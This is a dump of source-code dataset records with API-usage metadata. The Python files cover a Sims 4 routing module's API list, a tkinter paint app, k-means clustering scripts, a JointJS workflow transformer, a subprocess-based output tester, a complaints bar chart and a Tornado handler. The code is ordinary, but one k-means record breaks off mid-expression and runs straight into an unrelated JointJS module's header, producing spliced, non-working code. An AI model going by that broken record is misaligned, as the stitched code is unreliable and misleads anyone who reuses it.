{"api_name": "routing.walkstyle.walkstyle_request.WalkStyleRequest", "line_number": 47, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 48, "usage_type": "name"}, {"api_name": "routing.waypoints.waypoint_stitching.WaypointStitchingVariant", "line_number": 49, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 49, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.Tunable", "line_number": 50, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 53, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.Tunable", "line_number": 54, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 57, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.OptionalTunable", "line_number": 58, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable.TunableRange", "line_number": 59, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 64, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.OptionalTunable", "line_number": 65, "usage_type": "call"}, {"api_name": "balloon.tunable_balloon.TunableBalloon", "line_number": 66, "usage_type": 
"call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 69, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 69, "usage_type": "name"}, {"api_name": "interactions.TargetType.ACTOR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "interactions.TargetType", "line_number": 78, "usage_type": "name"}, {"api_name": "event_testing.results.TestResult", "line_number": 96, "usage_type": "call"}, {"api_name": "interactions.constraints.ANYWHERE", "line_number": 100, "usage_type": "name"}, {"api_name": "interactions.constraints.Circle", "line_number": 103, "usage_type": "call"}, {"api_name": "sims4.utils.flexmethod", "line_number": 112, "usage_type": "name"}, {"api_name": "interactions.utils.routing.FollowPath", "line_number": 122, "usage_type": "argument"}, {"api_name": "sims4.random.random.choice", "line_number": 146, "usage_type": "call"}, {"api_name": "sims4.random.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sims4.random", "line_number": 146, "usage_type": "name"}, {"api_name": "sims4.math.angle_to_yaw_quaternion", "line_number": 180, "usage_type": "call"}, {"api_name": "sims4.math", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sims4.random.uniform", "line_number": 180, "usage_type": "call"}, {"api_name": "sims4.random", "line_number": 180, "usage_type": "name"}, {"api_name": "itertools.cycle", "line_number": 192, "usage_type": "call"}, {"api_name": "routing.Route", "line_number": 213, "usage_type": "call"}, {"api_name": "interactions.utils.routing.PlanRoute", "line_number": 214, "usage_type": "call"}, {"api_name": "element_utils.run_child", "line_number": 215, "usage_type": "call"}, {"api_name": "_math.Vector3", "line_number": 226, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 227, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 227, "usage_type": "attribute"}, {"api_name": "_math.Vector3", "line_number": 230, "usage_type": "call"}, {"api_name": "routing.get_default_obstacle_cost", "line_number": 232, "usage_type": "call"}, {"api_name": "interactions.utils.routing.get_route_element_for_path", "line_number": 241, "usage_type": "call"}, {"api_name": "element_utils.run_child", "line_number": 249, "usage_type": "call"}, {"api_name": "element_utils.do_all", "line_number": 249, "usage_type": "call"}]} +{"seq_id": "138846993", "text": "import tkinter\n\nfrom lib.engine import Engine\nfrom lib.file_processing.converter import Converter\nfrom lib.structure.color import Color\nfrom lib.view.dialog import Dialog\n\n\nclass MyLittlePaint:\n\n def __init__(self):\n self.engine = Engine()\n width = 600\n height = 400\n\n self.win = tkinter.Tk()\n self.win.geometry('%ix%i' % (width, height))\n self.canvas = tkinter.Canvas(\n highlightthickness=0\n )\n self.menu_line = tkinter.Menu()\n\n self.file_submenu = tkinter.Menu(self.menu_line, tearoff=False)\n self.menu_line.add_cascade(label='File', menu=self.file_submenu)\n self.file_submenu.add_command(\n label='New Image',\n command=self.create_new_image\n )\n self.file_submenu.add_command(\n label='Load Image',\n command=self.load_image\n )\n self.win.config(menu=self.menu_line)\n\n def create_new_image(self):\n dialog = Dialog(self.win, 'Create Image',\n 'Width', 'Height', 'BG color')\n self.win.wait_window(dialog.win)\n if dialog.result is None:\n return\n self.engine.create_pixmap(\n int(dialog.result['Width']),\n int(dialog.result['Height']),\n 
Color.by_name(dialog.result['BG color']),\n )\n\n def load_image(self):\n dialog = Dialog(self.win, 'Load Image', 'File Name')\n self.win.wait_window(dialog.win)\n if dialog.result is None:\n return\n filename = dialog.result['File Name']\n with open(filename, 'rb') as f:\n data = f.read()\n self.engine.set_pixmap(Converter.load(data))\n\n def start(self):\n self.win.mainloop()\n\n\nif __name__ == '__main__':\n app = MyLittlePaint()\n app.start()\n", "sub_path": "MyLittlePaint.py", "file_name": "MyLittlePaint.py", "file_ext": "py", "file_size_in_byte": 1812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "lib.engine.Engine", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.view.dialog.Dialog", "line_number": 36, "usage_type": "call"}, {"api_name": "lib.structure.color.Color.by_name", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.structure.color.Color", "line_number": 44, "usage_type": "name"}, {"api_name": "lib.view.dialog.Dialog", "line_number": 48, "usage_type": "call"}, {"api_name": "lib.file_processing.converter.Converter.load", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.file_processing.converter.Converter", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "323765700", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport math\r\nfrom sklearn import datasets\r\nimport matplotlib.pyplot as plt\r\n\r\niris = datasets.load_iris()\r\nk = 3 # Numero de clusters\r\n\r\ndata = iris['data']\r\n\r\nmedias = np.zeros((k,2))\r\n#grupos = {'grupo1': [ind1,media1],'grupo2' : [ind2,media2],'grupo3' : [ind3,media3] }\r\ngrupos = {}\r\n\r\ndef dist(x0, y0, x1, y1):\r\n a = (x1 - x0)**2 + (y1 - y0)**2\r\n b = math.sqrt(a)\r\n return b\r\n\r\n#-------------------------------Escolhe os nucleos\r\n\r\nfor i in range(k):\r\n ran = random.randint(0,len(data)-1)\r\n a = \"grupo\"+str(i+1)\r\n grupos[a] = [[],[]]\r\n grupos[a][0].append(ran)\r\n grupos[a][1] = data[ran][0:2]\r\n medias[i] = grupos[a][1]\r\n\r\n# ------------------------------Classifica\r\n \r\nfor j in range(len(data)):\r\n x0 = data[j][0]\r\n y0 = data[j][1]\r\n distancias = np.zeros((k,1))\r\n countIndice = 0\r\n# ------------------------------Verifica se ja existe o indice\r\n for a in grupos:\r\n for i in range(len(grupos[a][0])):\r\n if j == grupos[a][0][i]:\r\n countIndice += 1\r\n#---------------------------------Calcula a distancia entre todos os grupos\r\n if countIndice == 0:\r\n for i in range(k):\r\n a = \"grupo\"+str(i+1)\r\n x1 = grupos[a][1][0]\r\n y1 = grupos[a][1][1]\r\n distancias[i] = dist(x0, y0, x1, y1)\r\n \r\n#--------------------------------De acordo com as distancias adiciona no grupo correspondente\r\n for x in range(k):\r\n count = 0\r\n for y in range(k):\r\n if(distancias[x], 2014\n#\n\n\"\"\"\nFunctions to transform JointJS JSON content to domain workflows, catalogs,\nand libraries.\n\nSee:\n http://www.jointjs.com/\n\"\"\"\n\nimport json\n\nfrom simple.workflow.library.transformer.exceptions import TransformerError\nfrom simple.workflow.library import build_workflow, build_catalog\nfrom simple.workflow.library import build_library\n\n\ndef initialize(_, logger):\n \"\"\"\n Initialize the 
context for JointJS transformers.\n    \"\"\"\n\n    logger.info('Initializing JointJS JSON transformers.')\n    return {}\n\n\ndef to_workflow(logger, _, content):\n    \"\"\"\n    Transform native JointJS JSON content into a domain Workflow instance.\n    \"\"\"\n\n    logger.debug('Transforming JointJS JSON into workflow.')\n\n    try:\n        content = json.loads(content)\n    except Exception as error:\n        logger.error('Transformer encountered an error during JSON loading.',\n                     exc_info=error)\n        raise TransformerError(error.args) from error\n\n    metadata = content.get('metadata', {})\n    elements = content.get('cells', [])\n\n    # Iterate over the elements, stripping off the 'simple.' prefix used\n    # by the JointJS stencil set.\n\n    for element in elements:\n        value = element['type']\n        value = value[len('simple.'):] if value.startswith('simple.') else value\n        element['type'] = value\n\n    try:\n        return build_workflow(metadata, elements, logger)\n    except AttributeError as error:\n        raise TransformerError(error.args) from error\n\n\ndef to_catalog(logger, _, content, workflows):\n    \"\"\"\n    Transform native JointJS JSON content into a domain Catalog instance.\n    \"\"\"\n\n    logger.debug('Transforming JointJS JSON into catalog.')\n\n    try:\n        content = json.loads(content)\n    except Exception as error:\n        logger.error('Transformer encountered an error during JSON loading.',\n                     exc_info=error)\n        raise TransformerError(error.args) from error\n\n    try:\n        return build_catalog(content, workflows, logger)\n    except AttributeError as error:\n        raise TransformerError(error.args) from error\n\n\ndef to_library(logger, _, content, catalogs):\n    \"\"\"\n    Transform native JointJS JSON content into a domain Library instance.\n    \"\"\"\n\n    logger.debug('Transforming JointJS JSON into library.')\n\n    try:\n        content = json.loads(content)\n    except Exception as error:\n        logger.error('Transformer encountered an error during JSON loading.',\n                     exc_info=error)\n        raise TransformerError(error.args) from error\n\n    try:\n        return build_library(content, catalogs, logger)\n    except AttributeError as error:\n        raise TransformerError(error.args) from error\n", "sub_path": "simple/workflow/library/transformer/jointjs.py", "file_name": "jointjs.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 46, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_workflow", "line_number": 60, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 62, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 77, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_catalog", "line_number": 80, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 82, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 93, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 97, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_library", "line_number": 100, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 102, "usage_type": "call"}]} +{"seq_id": 
"479455201", "text": "import os\nimport subprocess\nfrom termcolor import colored\n\ndef test_original(test):\n if test.find(' ') != -1:\n test = test.split()\n return ((subprocess.run([\"./our_micro_paint\", \"micro_paint_tester/examples/\" + test[1], \"micro_paint_tester/examples/\" + test[1]], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n command = \"micro_paint_tester/examples/\" + test\n return ((subprocess.run([\"./our_micro_paint\", command], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n\n\ndef test_my(test):\n if test.find(' ') != -1:\n test = test.split()\n return ((subprocess.run([\"./my_micro_paint\", \"micro_paint_tester/examples/\" + test[1], \"micro_paint_tester/examples/\" + test[1]], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n command = \"micro_paint_tester/examples/\" + test\n return ((subprocess.run([\"./my_micro_paint\", command], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n\n\nif __name__ == \"__main__\":\n print(colored(\"TEST ARGUMENTS\".ljust(65) + \"RESULT\", \"yellow\"))\n try:\n os.remove(\"correct_log.txt\")\n os.remove(\"errors_log.txt\")\n except:\n pass\n with open(\"tests.txt\", \"r\") as fd_tests, open(\"errors_log.txt\", \"a+\") as fd_error_log, open(\"correct_log.txt\", \"a+\") as fd_correct_log:\n tests = fd_tests.readlines()\n for test in tests:\n if test[0] != '#':\n output = test_original(test[0:-1]);\n my_output = test_my(test[0:-1]);\n if output == my_output:\n print(test[0:-1].ljust(65), end=\"\")\n print(colored(\"CORRECT\", \"green\"))\n fd_correct_log.write(\"\\n****************************************\\n%s\\n****************************************\\n\" % (test))\n fd_correct_log.write(\"==========output==========\\nYOU:\\n%s\\nOUR:\\n%s\" % (my_output, output))\n else:\n print(test[0:-1].ljust(65), end=\"\")\n print(colored(\"WRONG\", \"red\"))\n fd_error_log.write(\"\\n****************************************\\n%s\\n****************************************\\n\" % (test))\n fd_error_log.write(\"==========output==========\\nYOU:\\n%s\\nOUR:\\n%s\\n\" % (my_output, output))\n", "sub_path": "micro_paint/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "subprocess.run", "line_number": 8, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 8, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 22, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 25, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 36, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "96399175", "text": "#!/usr/bin/env python3\n\"\"\"Implementation of K means and K means ++ algorithm\"\"\"\nimport sys\n\nimport random\nfrom copy import deepcopy\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.decomposition 
import PCA\nfrom sklearn.metrics import silhouette_score\n#import matplotlib.pyplot as plt\n\ndef preprocessing_churn_data(data):\n    \"\"\"Pre processing data\"\"\"\n    #print(data.info())\n    #print(data.head())\n    dataframe_churn = pd.DataFrame(data)\n    \"\"\"Pre processing data\n    dataframe_churn = pd.DataFrame(data=dataframe_churn, \\\n    columns=['customerID', 'gender', 'SeniorCitizen', 'Partner', 'Dependents', \\\n    'tenure', 'PhoneService', 'MultipleLines', 'InternetService', 'OnlineSecurity', \\\n    'OnlineBackup', 'DeviceProtection', 'TechSupport', 'StreamingTV', 'StreamingMovies', \\\n    'PaperlessBilling', 'PaymentMethod', 'MonthlyCharges', 'TotalCharges'])\"\"\"\n    dataframe_churn.drop(dataframe_churn.columns[[0]], axis=1, inplace=True)\n    categorical_cols = {1, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17}\n    for num in categorical_cols:\n        dataframe_churn[num] = preprocessing.LabelEncoder().fit_transform(dataframe_churn[num])\n        #dataframe_churn[num] = dataframe_churn[num].astype('category')\n        #dataframe_churn[num] = dataframe_churn[num].cat.codes\n    dataframe_churn[19] = pd.to_numeric(dataframe_churn[19], errors=\"coerce\")\n    dataframe_churn.dropna(how='any', inplace=True)\n    return dataframe_churn\n\ndef normalize_data(data):\n    \"\"\"Normalize data to value between 0 and 1\"\"\"\n    minmax_processed = preprocessing.MinMaxScaler().fit_transform(data)\n    normalized_df = pd.DataFrame(minmax_processed)\n    return normalized_df\n\ndef euclidian_dist(point1, point2, axis=1):\n    \"\"\"Euclidean distance between 2 points in Euclidean space\"\"\"\n    return np.linalg.norm(point1 - point2, axis=axis)\n\ndef initial_centroids(data, k):\n    \"\"\"Random initial centroids for k means\"\"\"\n    centroids = random.sample(list(data), k)\n    return centroids\n\ndef has_converged(centroids, centroids_old):\n    \"\"\"Check if k means has converged\"\"\"\n    return False\n    #return set([tuple(a) for a in centroids]) == set([tuple(a) for a in centroids_old])\n\ndef distance_from_centers(X, centroids):\n    \"\"\"D2 Squared distance for points from centers\"\"\"\n    dist_squared = np.array([min([np.linalg.norm(x-center)**2 for center in centroids]) for x in X])\n    return dist_squared\n\ndef next_center(X, dist_squared):\n    \"\"\"Select next center based on highest probability\"\"\"\n    prob = dist_squared/dist_squared.sum()\n    cumprob = prob.cumsum()\n    r = random.random()\n    index = np.where(cumprob >= r)[0][0]\n    return X[index]\n\ndef kpp_centers(X, k):\n    \"\"\"Initial Centers for k plus plus clustering\"\"\"\n    centroids = random.sample(list(X), 1)\n    for i in range(1, k):\n        dist = distance_from_centers(X, centroids)\n        centroids.append(next_center(X, dist))\n    return centroids\n\ndef k_means(data, k, init=\"random\"):\n    \"\"\"function implementing k-means algorithm\"\"\"\n    #inputs dataframe, number of clusters and type of kmeans\n    normalized_df = normalize_data(data)\n    x = normalized_df.values\n    X = np.array(list(zip(x)))\n    clusters = np.zeros(len(X))\n    #Initial cluster centers\n    if init == \"random\":\n        centroids = initial_centroids(X, k)\n    else:\n        centroids = kpp_centers(X, k)\n    #k Means algorithm. 
Iterate until convergence\n    max_iterations = 500\n    while max_iterations >= 0:\n        for i in range(len(X)):\n            distances = [euclidian_dist(X[i], center) for center in centroids]\n            cluster = np.argmin(distances)\n            clusters[i] = cluster\n\n        centroids_old = deepcopy(centroids)\n        #new centroids are mean of all data points in new cluster\n        for i in range(k):\n            points = [X[j] for j in range(len(X)) if clusters[j] == i]\n            centroids[i] = np.mean(points, axis=0)\n        #centroids = new_centers(k, X, clusters)\n        if has_converged(centroids, centroids_old):\n            print(\"breaking...... Convergence\")\n            #break\n        max_iterations = max_iterations - 1\n    return clusters\n\n\ndef pca_analysis(data):\n    \"\"\"Performing principal component analysis for our data\"\"\"\n    pca_data = normalize_data(data)\n    sklearn_pca = PCA(n_components=2)\n    principal_components = sklearn_pca.fit_transform(pca_data)\n    principal_df = pd.DataFrame(data=principal_components, \\\n    columns=['Principal Component 1', 'Principal Component 2'])\n    #plt.figure(figsize=(10, 8))\n    #plt.scatter(principal_df[:, 0], principal_df[:, 1], c=y)\n    pca_kmeans = k_means(principal_df, 2)\n    pca_kpp = k_means(principal_df, 2, \"kpp\")\n\ndef optimal_k(data, n_clusters, type_kmeans):\n    \"\"\"Find optimal number of k clusters using Silhouette score analysis\"\"\"\n    normalized_df = normalize_data(data)\n    matrix = normalized_df.as_matrix()\n    k_scores = []\n    for n_clusters in range(2, 30):\n        clusters = k_means(data, n_clusters, type_kmeans)\n        silhouette_avg = silhouette_score(matrix, clusters)\n        k_scores.append(silhouette_avg)\n        print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n\n    #Plot the average Silhouette score for each num\n    #plt.figure(figsize=(12, 8))\n    #plt.plot(range(2, 30), k_scores)\n    #plt.xlabel('No of Clusters')\n    #plt.ylabel('Silhouette_avg')\n    #plt.title('Silhouette Score for different clusters')\n\n    return k_scores\n\ndef main():\n    \"\"\"main function\"\"\"\n    try:\n        data = pd.read_csv(sys.argv[1], header=None)\n        k = int(sys.argv[2])\n        type_kmeans = sys.argv[3]\n    except IndexError:\n        print(\"Expected 3 inputs : filepath , number of clusters and type of kmeans. 
\\\n \\nProgram exiting....\")\n sys.exit(1)\n\n #K - means clustering\n if len(data.columns) >= 15:\n #cluster.csv dataset\n procesed_churn_data = preprocessing_churn_data(data)\n procesed_churn_data_df = pd.DataFrame(procesed_churn_data)\n clusters = k_means(procesed_churn_data_df, 2, type_kmeans)\n optimal_k(procesed_churn_data_df, 2, type_kmeans)\n else:\n #wine.csv dataset\n clusters = k_means(data, k, type_kmeans)\n optimal_k(data, k, type_kmeans)\n\n #k_scores = optimal_k(data)\n \"\"\"\n #Perform PCA\n #pca_analysis(data)\n \"\"\"\n output = pd.DataFrame(clusters)\n output.to_csv('output.csv', sep=',', index=False, header=None)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "source.py", "file_name": "source.py", "file_ext": "py", "file_size_in_byte": 6509, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 28, "usage_type": "name"}, {"api_name": "pandas.to_numeric", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 37, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 43, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 65, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 93, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.silhouette_score", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "148751546", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#\ndataset=pd.read_csv('311_Service_Requests_from_2010_to_Present.csv')\ndata=dataset[['Complaint 
Type','City']]\n#data=data.iloc[0:100,:]\nFinalData=[]\nucity=data['City'].unique()\nucomplaintdata=data['Complaint Type'].unique()\n\nfor ctype in ucomplaintdata:\n Complaint=[]\n City=[]\n Count=[]\n Complaint.append(ctype)\n for city in ucity:\n City.append(city)\n Count.append(data['Complaint Type'][data['Complaint Type'] == ctype][data['City'] == city].count())\n Complaint.append(City)\n Complaint.append(Count)\n FinalData.append(Complaint)\nComplaint=[]\nCity=[]\nCount=[]\nCity=FinalData[0][1]\nfor i in range(0,len(FinalData)):\n Complaint.append(FinalData[i][0])\n Count.append(FinalData[i][2])\n \nXIndex=np.arange(len(City))\nk=len(City)*[0]\nfor i in range(0,len(Count)):\n \n if(i==0):\n plt.bar(XIndex,Count[i],edgecolor='Black')\n else:\n plt.bar(XIndex,Count[i],bottom=k,edgecolor='Black')\n k=np.add(k,Count[i])\n for j in XIndex:\n if((Count[i][j])!=0):\n plt.text(j,k[j]-((Count[i][j])/2),(Count[i][j]),size=3)\n \nplt.xlabel('City') \nplt.ylabel('Complaint count')\n#plt.ylim(0,max(k)) \nplt.xticks(XIndex,City,fontsize=5,rotation=90)\nplt.legend(Complaint,fontsize=5,loc='upper right')\nplt.title('City vs Complaint Count')\nplt.grid()\n#plt.figure(figsize=(2,1))\nplt.savefig('final1.png')\n\n \n", "sub_path": "Service_Requests/ServiceRequests.py", "file_name": "ServiceRequests.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.add", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "551075045", "text": "#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport tornado.web\nimport json\nfrom utils import utils\nfrom utils import KEY\nfrom database import db\nfrom tornado.escape import json_encode\n\nclass GetRecipientInfoHandler(tornado.web.RequestHandler):\n def 
post(self):\n params = {}\n resp = {KEY.STATUS: 500}\n params = utils.decode_params(self.request)\n if KEY.EVENT_ID not in params:\n self.write(json_encode(resp))\n return\n\n '''trans the term's type'''\n params[KEY.EVENT_ID] = int(params[KEY.EVENT_ID])\n launcher_info = db.get_event_information(params)\n if launcher_info is not None:\n user_info = db.get_user_information({KEY.ID: launcher_info[KEY.LAUNCHER_ID]})\n if user_info is not None:\n resp[KEY.STATUS] = 200\n resp[KEY.ID] = user_info[KEY.ID]\n resp[KEY.NICKNAME] = user_info[KEY.NICKNAME]\n resp[KEY.NAME] = user_info[KEY.NAME]\n resp[KEY.AGE] = user_info[KEY.AGE]\n resp[KEY.GENDER] = user_info[KEY.GENDER]\n resp[KEY.PHONE] = user_info[KEY.PHONE]\n resp[KEY.OCCUPATION] = user_info[KEY.OCCUPATION]\n resp[KEY.REPUTATION] = user_info[KEY.REPUTATION]\n resp[KEY.LOCATION] = user_info[KEY.LOCATION]\n resp[KEY.IS_VERIFY] = user_info[KEY.IS_VERIFY]\n\n self.write(json_encode(resp))\n", "sub_path": "android/project/handlerforandroid/get_recipient_info.py", "file_name": "get_recipient_info.py", "file_ext": "py", "file_size_in_byte": 1444, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tornado.web.web", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 10, "usage_type": "name"}, {"api_name": "utils.KEY.STATUS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.utils.decode_params", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 15, "usage_type": "name"}, {"api_name": "tornado.escape.json_encode", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 20, "usage_type": "name"}, {"api_name": "database.db.get_event_information", "line_number": 21, "usage_type": "call"}, {"api_name": "database.db", "line_number": 21, "usage_type": "name"}, {"api_name": "database.db.get_user_information", "line_number": 23, "usage_type": "call"}, {"api_name": "database.db", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATUS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 26, "usage_type": "name"}, {"api_name": 